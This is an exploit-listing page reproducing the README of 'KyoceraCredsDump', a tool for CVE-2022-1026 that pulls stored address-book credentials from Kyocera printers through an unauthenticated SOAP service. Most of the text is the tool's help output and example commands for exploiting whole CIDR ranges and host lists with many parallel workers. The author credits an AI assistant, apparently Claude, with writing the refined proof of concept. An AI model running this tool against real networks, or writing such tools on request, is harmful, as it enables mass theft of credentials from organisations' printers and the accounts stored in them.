Share
## https://sploitus.com/exploit?id=C24ADA50-AE4B-5E4E-8763-BEE647734EC5
# KyoceraCredsDump - CVE-2022-1026
- Based on the original exploit from Aaron Herndon, @ac3lives (Rapid7) - https://www.rapid7.com/blog/post/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/
- credits to Aaron Herndon / https://twitter.com/ac3lives
- Thanks claude for creating the refined PoC for me ;)

- Since I still encounter kyocera printers vulnerable to this exploit everyday, I wanted to have a more refined PoC, that allows for scanning of network ranges or multiple hosts and also prettifies the acquired credentials for quick summary.

## Usage
```
python3 KyoceraCredsDump.py -h
usage: getKyoceraCreds.py [-h] -t TARGET [-p PORT] [--timeout TIMEOUT] [--connect-timeout CONNECT_TIMEOUT] [--workers WORKERS] [--no-probe]

Kyocera printer address-book credential extractor (unauthenticated SOAP)

options:
  -h, --help            show this help message and exit
  -t, --target TARGET   Target spec: IP, CIDR, dash-range, or comma list (see examples below)
  -p, --port PORT       TCP port of the Kyocera SOAP service (default: 9091)
  --timeout TIMEOUT     HTTP timeout in seconds for the exploit (default: 10)
  --connect-timeout CONNECT_TIMEOUT
                        TCP connect-timeout for pre-flight port probe in seconds (default: 1.0)
  --workers WORKERS     Concurrent workers for port probe and exploitation (default: 50)
  --no-probe            Skip pre-flight TCP probe, exploit every target

Target formats (used with -t/--target):
  Single IP:    172.16.2.5
  CIDR:         172.16.2.0/24
  Range:        172.16.2.1-172.16.2.10   or   172.16.2.1-10
  Comma list:   172.16.2.1,172.16.2.2,172.16.2.50
  Mix:          172.16.2.0/28,172.16.3.5,172.16.4.1-10

Examples:
  python3 getKyoceraCreds.py -t 172.16.2.0/24
  python3 getKyoceraCreds.py -t 172.16.2.1-172.16.2.10
  python3 getKyoceraCreds.py -t 172.16.2.1,172.16.2.2,172.16.2.50
  python3 getKyoceraCreds.py -t 172.16.2.5 -p 443
  python3 getKyoceraCreds.py -t 172.16.2.0/24 --workers 100 --connect-timeout 1
```